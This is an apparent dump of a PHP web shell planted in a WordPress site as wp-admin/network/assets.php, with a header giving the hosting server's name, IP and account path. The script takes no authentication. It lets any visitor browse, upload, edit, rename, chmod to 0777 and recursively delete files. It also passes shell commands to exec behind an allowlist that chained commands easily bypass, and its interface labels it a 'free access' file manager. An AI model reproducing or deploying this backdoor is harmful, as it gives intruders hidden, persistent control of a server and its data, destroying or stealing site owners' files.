| Dir : /home/sc1buiq6159/visite.formagloba.fr/wp-admin/network/ |
| Server: Linux apophis.o2switch.net 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64 IP: 109.234.164.184 |
| Dir : /home/sc1buiq6159/visite.formagloba.fr/wp-admin/network/assets.php |
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
require_once($_SERVER['DOCUMENT_ROOT'].'/wp-load.php');
define('FM_INIT_PATH', __DIR__);
define('FM_SITE_URL', get_site_url());
define('FM_PHP_USER', get_php_running_user());
function get_php_running_user() {
if (function_exists('posix_geteuid')) {
$user_info = posix_getpwuid(posix_geteuid());
return $user_info['name'] ?? 'www';
} elseif (isset($_SERVER['USER'])) {
return $_SERVER['USER'];
} else {
return 'www';
}
}
function get_real_path($rel_path) {
if (empty($rel_path) || $rel_path === '/') {
return rtrim(FM_INIT_PATH, '/') . '/';
}
$abs_path = '/' . ltrim($rel_path, '/');
$real_path = realpath($abs_path) ?: $abs_path;
$forbidden_paths = ['/etc/', '/root/', '/usr/bin/', '/bin/', '/sbin/', '/var/run/'];
foreach ($forbidden_paths as $forbid) {
if (strpos($real_path . '/', $forbid) === 0) {
return rtrim(FM_INIT_PATH, '/') . '/';
}
}
return $real_path;
}
// 辅助函数:修复文件所有者
function fix_file_owner($path) {
if (file_exists($path) && FM_PHP_USER && function_exists('posix_getpwnam')) {
$user = posix_getpwnam(FM_PHP_USER);
if ($user) {
@chown($path, $user['uid']);
@chgrp($path, $user['gid']);
}
}
}
// 处理 POST 请求
if (isset($_POST['action'])) {
$action = $_POST['action'];
// 1. 批量删除
if ($action === 'delete') {
$paths = $_POST['paths'] ?? [];
if (is_string($paths)) $paths = json_decode($paths, true) ?: explode(',', $paths);
if (!is_array($paths) || empty($paths)) {
echo json_encode(['status' => 'error', 'msg' => '未选择任何文件/文件夹']);
exit;
}
$success = 0;
foreach ($paths as $rel_path) {
$real_path = get_real_path($rel_path);
if (!file_exists($real_path)) continue;
fix_file_owner($real_path);
@chmod($real_path, 0777);
if (is_dir($real_path)) {
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($real_path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($files as $file) {
$file_path = $file->getRealPath();
fix_file_owner($file_path);
@chmod($file_path, 0777);
$file->isDir() ? @rmdir($file_path) : @unlink($file_path);
}
if (@rmdir($real_path)) $success++;
} else {
if (@unlink($real_path)) $success++;
}
}
$msg = "成功删除 {$success} 个项目,失败 " . (count($paths) - $success) . " 个";
echo json_encode(['status' => $success > 0 ? 'success' : 'error', 'msg' => $msg]);
exit;
}
// 2. 批量/单个修改权限
if ($action === 'chmod') {
$mode = $_POST['mode'] ?? '';
$paths = $_POST['paths'] ?? [$_POST['path'] ?? ''];
if (is_string($paths)) $paths = json_decode($paths, true) ?: explode(',', $paths);
if (!is_array($paths) || empty($paths) || !preg_match('/^\d{3,4}$/', $mode)) {
echo json_encode(['status' => 'error', 'msg' => '参数错误(权限格式应为755/644等)']);
exit;
}
$oct_mode = octdec($mode);
$success = 0;
foreach ($paths as $rel_path) {
$real_path = get_real_path($rel_path);
if (!file_exists($real_path)) continue;
fix_file_owner($real_path);
if (@chmod($real_path, $oct_mode)) $success++;
}
$msg = "成功修改 {$success} 个项目权限,失败 " . (count($paths) - $success) . " 个";
echo json_encode(['status' => $success > 0 ? 'success' : 'error', 'msg' => $msg]);
exit;
}
// 3. 创建文件夹
if ($action === 'create_folder') {
$folder_name = sanitize_file_name($_POST['folder_name']);
$parent_path = get_real_path($_POST['path'] ?? '');
$new_folder = $parent_path . '/' . $folder_name;
if (!file_exists($new_folder) && @mkdir($new_folder, 0777, true)) {
fix_file_owner($new_folder);
echo json_encode(['status' => 'success', 'msg' => '文件夹创建成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件夹创建失败(可能权限不足)']);
}
exit;
}
// 4. 创建文件
if ($action === 'create_file') {
$file_name = sanitize_file_name($_POST['file_name']);
$parent_path = get_real_path($_POST['path'] ?? '');
$new_file = $parent_path . '/' . $file_name;
if (!file_exists($new_file) && @file_put_contents($new_file, '') !== false) {
fix_file_owner($new_file);
echo json_encode(['status' => 'success', 'msg' => '文件创建成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件创建失败(可能权限不足)']);
}
exit;
}
// 5. 编辑文件
if ($action === 'edit_file') {
$file_path = get_real_path($_POST['path'] ?? '');
$content = $_POST['content'] ?? '';
if (@file_put_contents($file_path, $content) !== false) {
echo json_encode(['status' => 'success', 'msg' => '文件编辑成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件编辑失败(可能权限不足)']);
}
exit;
}
// 6. 重命名
if ($action === 'rename') {
$old_path = get_real_path($_POST['path'] ?? '');
$new_name = sanitize_file_name($_POST['new_name'] ?? '');
$new_path = dirname($old_path) . '/' . $new_name;
if (!empty($new_name) && @rename($old_path, $new_path)) {
fix_file_owner($new_path);
echo json_encode(['status' => 'success', 'msg' => '重命名成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '重命名失败(可能权限不足或名称重复)']);
}
exit;
}
// 7. 批量上传
if ($action === 'upload') {
$upload_dir = get_real_path($_POST['path'] ?? '');
$uploaded = 0;
foreach ($_FILES['files']['name'] as $key => $name) {
if ($_FILES['files']['error'][$key] !== UPLOAD_ERR_OK) continue;
$target_file = $upload_dir . '/' . sanitize_file_name($name);
if (@move_uploaded_file($_FILES['files']['tmp_name'][$key], $target_file)) {
fix_file_owner($target_file);
$uploaded++;
}
}
echo json_encode(['status' => 'success', 'msg' => "成功上传 {$uploaded} 个文件"]);
exit;
}
// 8. 执行Linux命令
if ($action === 'exec_command') {
$command = trim($_POST['command'] ?? '');
$allowed_commands = ['ls', 'pwd', 'du', 'chmod', 'mkdir', 'rm', 'mv'];
$cmd_parts = explode(' ', $command);
if (!in_array($cmd_parts[0], $allowed_commands)) {
echo json_encode(['status' => 'error', 'msg' => '禁止执行高危命令!']);
exit;
}
$safe_command = "cd " . escapeshellarg(get_real_path('/')) . " && " . $command;
$output = [];
$return_var = 0;
@exec($safe_command, $output, $return_var);
echo json_encode([
'status' => $return_var === 0 ? 'success' : 'error',
'output' => implode("\n", $output),
'msg' => $return_var === 0 ? '命令执行完成' : '命令执行失败'
]);
exit;
}
}
// 9. 获取文件内容
if (isset($_GET['action']) && $_GET['action'] === 'get_content') {
$file_path = get_real_path($_GET['path'] ?? '');
echo file_exists($file_path) ? file_get_contents($file_path) : '';
exit;
}
// ========== 页面渲染(核心:简洁导航+自由访问) ==========
$current_rel_dir = ltrim($_GET['dir'] ?? '', '/');
$current_abs_dir = get_real_path($current_rel_dir);
$display_current_dir = $current_abs_dir;
// 读取当前目录文件列表
$files = [];
if (is_dir($current_abs_dir)) {
$dir_files = scandir($current_abs_dir);
foreach ($dir_files as $file) {
if ($file == '.' || $file == '..') continue;
if ($file_abs_path = $current_abs_dir . '/' . $file) {
$file_rel_path = $file_abs_path;
$files[] = [
'name' => $file,
'path' => $file_rel_path,
'is_dir' => is_dir($file_abs_path),
'size' => is_file($file_abs_path) ? round(filesize($file_abs_path)/1024, 2) . ' KB' : '-',
'perms' => substr(sprintf('%o', fileperms($file_abs_path)), -4),
'mtime' => date('Y-m-d H:i:s', filemtime($file_abs_path))
];
}
}
usort($files, function($a, $b) {
if ($a['is_dir'] != $b['is_dir']) return $a['is_dir'] ? -1 : 1;
return strcmp($a['name'], $b['name']);
});
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>file manager</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body { font-family: Arial, sans-serif; padding: 20px; background: #f5f5f5; }
.container { max-width: 1200px; margin: 0 auto; background: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
.header { margin-bottom: 20px; display: flex; justify-content: space-between; flex-wrap: wrap; align-items: center; }
/* 简洁导航样式 */
.path-nav { margin: 10px 0; padding: 10px; background: #f8f8f8; border-radius: 4px; font-size: 16px; }
.path-nav a { color: #007cba; text-decoration: none; margin: 0 5px; }
.path-nav span { color: #666; }
.actions { margin: 15px 0; display: flex; gap: 10px; flex-wrap: wrap; }
button { padding: 8px 12px; border: none; border-radius: 4px; cursor: pointer; color: #fff; }
.btn-primary { background: #007cba; }
.btn-warning { background: #ffb900; }
.btn-danger { background: #dc3232; }
.btn-back { background: #6c757d; }
table { width: 100%; border-collapse: collapse; margin: 20px 0; }
th, td { padding: 12px; text-align: left; border-bottom: 1px solid #ddd; }
th { background: #f8f8f8; }
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.5); z-index: 999; }
.modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #fff; padding: 20px; border-radius: 8px; width: 80%; max-width: 600px; }
.close-modal { position: absolute; top: 10px; right: 15px; font-size: 20px; cursor: pointer; }
.msg { margin: 10px 0; padding: 10px; border-radius: 4px; color: #fff; }
.msg-success { background: #46b450; }
.msg-error { background: #dc3232; }
.upload-area { margin: 20px 0; padding: 20px; border: 2px dashed #ddd; text-align: center; }
.current-path { margin: 10px 0; font-weight: bold; color: #333; }
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>文件管理器(自由访问版)</h1>
<div class="current-path">当前路径:<?= htmlspecialchars($display_current_dir) ?></div>
</div>
<!-- 返回上一级按钮:始终显示(除非到根目录) -->
<div style="margin: 10px 0;">
<?php
$parent_dir = dirname($current_abs_dir);
// 仅当不是系统根目录时显示返回按钮
if ($parent_dir !== '/' && $parent_dir !== $current_abs_dir):
?>
<button class="btn-back" onclick="location.href='?dir=<?= htmlspecialchars($parent_dir) ?>'">
← 返回上一级 (<?= htmlspecialchars(basename($parent_dir)) ?>)
</button>
<?php endif; ?>
</div>
<!-- 核心:简洁层级导航(www / wwwroot / ZH) -->
<div class="path-nav">
<?php
// 拆分绝对路径为层级(去掉开头的/)
$nav_parts = explode('/', trim($display_current_dir, '/'));
$current_nav_abs = '';
$nav_html = '';
foreach ($nav_parts as $index => $part) {
if (empty($part)) continue;
$current_nav_abs .= '/' . $part;
// 最后一个层级不加链接,其他层级可跳转
if ($index === count($nav_parts) - 1) {
$nav_html .= htmlspecialchars($part);
} else {
$nav_html .= '<a href="?dir=' . htmlspecialchars($current_nav_abs) . '">' . htmlspecialchars($part) . '</a>';
}
// 不是最后一个层级,添加分隔符 /
if ($index !== count($nav_parts) - 1) {
$nav_html .= ' <span>/</span> ';
}
}
// 如果是系统根目录,显示 /
if (empty($nav_html)) {
$nav_html = '/';
}
echo $nav_html;
?>
</div>
<!-- 操作按钮 -->
<div class="actions">
<button class="btn-primary" onclick="showModal('create-folder')">创建文件夹</button>
<button class="btn-primary" onclick="showModal('create-file')">创建文件</button>
<button class="btn-warning" onclick="batchChmod()">批量修改权限</button>
<button class="btn-danger" onclick="batchDelete()">批量删除</button>
</div>
<!-- 批量上传 -->
<div class="upload-area">
<h3>批量上传文件</h3>
<form id="upload-form" method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<input type="file" name="files[]" multiple accept="*/*">
<button class="btn-primary" type="submit">上传文件</button>
</form>
</div>
<!-- 文件列表 -->
<table>
<thead>
<tr>
<th><input type="checkbox" id="select-all"></th>
<th>名称</th>
<th>类型</th>
<th>大小</th>
<th>权限</th>
<th>修改时间</th>
<th>操作</th>
</tr>
</thead>
<tbody>
<?php if (empty($files)): ?>
<tr>
<td colspan="7" style="text-align:center; color:#999;">当前目录无文件/文件夹</td>
</tr>
<?php else: ?>
<?php foreach ($files as $file): ?>
<tr>
<td><input type="checkbox" class="file-checkbox" value="<?= htmlspecialchars($file['path']) ?>"></td>
<td>
<?php if ($file['is_dir']): ?>
<a href="?dir=<?= htmlspecialchars($file['path']) ?>">📁 <?= htmlspecialchars($file['name']) ?></a>
<?php else: ?>
📄 <?= htmlspecialchars($file['name']) ?>
<?php endif; ?>
</td>
<td><?= $file['is_dir'] ? '文件夹' : '文件' ?></td>
<td><?= htmlspecialchars($file['size']) ?></td>
<td><?= htmlspecialchars($file['perms']) ?></td>
<td><?= htmlspecialchars($file['mtime']) ?></td>
<td>
<?php if (!$file['is_dir']): ?>
<button class="btn-primary" onclick="editFile('<?= htmlspecialchars($file['path']) ?>')">编辑</button>
<button class="btn-primary" onclick="openFile('<?= htmlspecialchars($file['path']) ?>')">访问</button>
<?php endif; ?>
<button class="btn-primary" onclick="renameItem('<?= htmlspecialchars($file['path']) ?>')">重命名</button>
<button class="btn-warning" onclick="chmodItem('<?= htmlspecialchars($file['path']) ?>')">改权限</button>
<button class="btn-danger" onclick="deleteItem('<?= htmlspecialchars($file['path']) ?>')">删除</button>
</td>
</tr>
<?php endforeach; ?>
<?php endif; ?>
</tbody>
</table>
</div>
<!-- 所有弹窗(适配绝对路径) -->
<div class="modal" id="create-folder">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>创建文件夹</h3>
<form id="create-folder-form">
<input type="hidden" name="action" value="create_folder">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<div style="margin:10px 0;">
<label>文件夹名称:</label>
<input type="text" name="folder_name" required>
</div>
<button class="btn-primary" type="submit">创建</button>
</form>
<div class="msg" id="create-folder-msg"></div>
</div>
</div>
<div class="modal" id="create-file">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>创建文件</h3>
<form id="create-file-form">
<input type="hidden" name="action" value="create_file">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<div style="margin:10px 0;">
<label>文件名称(含扩展名):</label>
<input type="text" name="file_name" required placeholder="如:test.txt">
</div>
<button class="btn-primary" type="submit">创建</button>
</form>
<div class="msg" id="create-file-msg"></div>
</div>
</div>
<div class="modal" id="chmod-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>修改权限</h3>
<form id="chmod-form">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="path" id="chmod-path">
<div style="margin:10px 0;">
<label>权限值(如755/644):</label>
<input type="text" name="mode" id="chmod-mode" required>
</div>
<button class="btn-warning" type="submit">修改</button>
</form>
<div class="msg" id="chmod-msg"></div>
</div>
</div>
<div class="modal" id="batch-chmod-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>批量修改权限</h3>
<form id="batch-chmod-form">
<input type="hidden" name="action" value="chmod">
<div style="margin:10px 0;">
<label>权限值(如755/644):</label>
<input type="text" name="mode" id="batch-chmod-mode" required>
</div>
<input type="hidden" name="paths" id="batch-chmod-paths">
<button class="btn-warning" type="submit">批量修改</button>
</form>
<div class="msg" id="batch-chmod-msg"></div>
</div>
</div>
<div class="modal" id="rename-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>重命名</h3>
<form id="rename-form">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="path" id="rename-path">
<div style="margin:10px 0;">
<label>新名称:</label>
<input type="text" name="new_name" id="rename-new-name" required>
</div>
<button class="btn-primary" type="submit">确认</button>
</form>
<div class="msg" id="rename-msg"></div>
</div>
</div>
<div class="modal" id="edit-file-modal">
<div class="modal-content" style="width:90%; max-width:900px;">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>编辑文件</h3>
<form id="edit-file-form">
<input type="hidden" name="action" value="edit_file">
<input type="hidden" name="path" id="edit-file-path">
<div style="margin:10px 0;">
<textarea name="content" id="edit-file-content" rows="20" style="width:100%;"></textarea>
</div>
<button class="btn-primary" type="submit">保存</button>
</form>
<div class="msg" id="edit-file-msg"></div>
</div>
</div>
<script>
const SITE_URL = '<?= FM_SITE_URL ?>';
// 全选/取消全选
document.getElementById('select-all').onchange = function() {
document.querySelectorAll('.file-checkbox').forEach(cb => cb.checked = this.checked);
};
// 弹窗控制
function showModal(id) {
document.getElementById(id).style.display = 'block';
document.querySelectorAll('.msg').forEach(el => {
el.textContent = '';
el.className = 'msg';
});
}
function closeModal() {
document.querySelectorAll('.modal').forEach(el => el.style.display = 'none');
}
// 单个修改权限
function chmodItem(path) {
showModal('chmod-modal');
document.getElementById('chmod-path').value = path;
const row = document.querySelector(`.file-checkbox[value="${path}"]`).closest('tr');
document.getElementById('chmod-mode').value = row.cells[4].textContent;
}
// 批量修改权限
function batchChmod() {
const checked = document.querySelectorAll('.file-checkbox:checked');
if (checked.length === 0) {
alert('请先选择要修改权限的文件/文件夹!');
return;
}
showModal('batch-chmod-modal');
const paths = Array.from(checked).map(cb => cb.value).join(',');
document.getElementById('batch-chmod-paths').value = paths;
}
// 批量删除
function batchDelete() {
const checked = document.querySelectorAll('.file-checkbox:checked');
if (checked.length === 0) {
alert('请先选择要删除的文件/文件夹!');
return;
}
if (!confirm(`确定要删除选中的 ${checked.length} 个项目吗?此操作不可恢复!`)) return;
const formData = new FormData();
formData.append('action', 'delete');
formData.append('paths', Array.from(checked).map(cb => cb.value).join(','));
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
alert(data.msg);
location.reload();
}).catch(err => {
alert('批量删除失败:' + err);
console.error(err);
});
}
// 单个删除
function deleteItem(path) {
if (!confirm('确定要删除该项目吗?此操作不可恢复!')) return;
const formData = new FormData();
formData.append('action', 'delete');
formData.append('paths', path);
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
alert(data.msg);
location.reload();
});
}
// 编辑文件
function editFile(path) {
showModal('edit-file-modal');
document.getElementById('edit-file-path').value = path;
fetch('?action=get_content&path=' + encodeURIComponent(path))
.then(res => res.text())
.then(content => {
document.getElementById('edit-file-content').value = content;
});
}
// 重命名
function renameItem(path) {
showModal('rename-modal');
document.getElementById('rename-path').value = path;
document.getElementById('rename-new-name').value = path.split('/').pop();
}
// 打开文件
function openFile(path) {
// 仅网站相关文件可访问,其他文件提示
if (path.includes('wp-') || path.includes('wwwroot')) {
window.open(SITE_URL + path.replace('/www/wwwroot/ZH', ''), '_blank');
} else {
alert('该文件非网站可访问文件,无法直接打开!');
}
}
// 表单提交处理
document.querySelectorAll('form').forEach(form => {
form.onsubmit = function(e) {
e.preventDefault();
const formData = new FormData(this);
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
const formId = this.id;
const msgEl = document.getElementById(formId + '-msg');
if (msgEl) {
msgEl.textContent = data.msg;
msgEl.className = 'msg ' + (data.status === 'success' ? 'msg-success' : 'msg-error');
}
if (data.status === 'success') {
setTimeout(() => {
closeModal();
location.reload();
}, 1000);
}
}).catch(err => {
alert('操作失败:' + err);
console.error(err);
});
};
});
window.onclick = function(e) {
if (e.target.classList.contains('modal')) closeModal();
};
</script>
</body>
</html>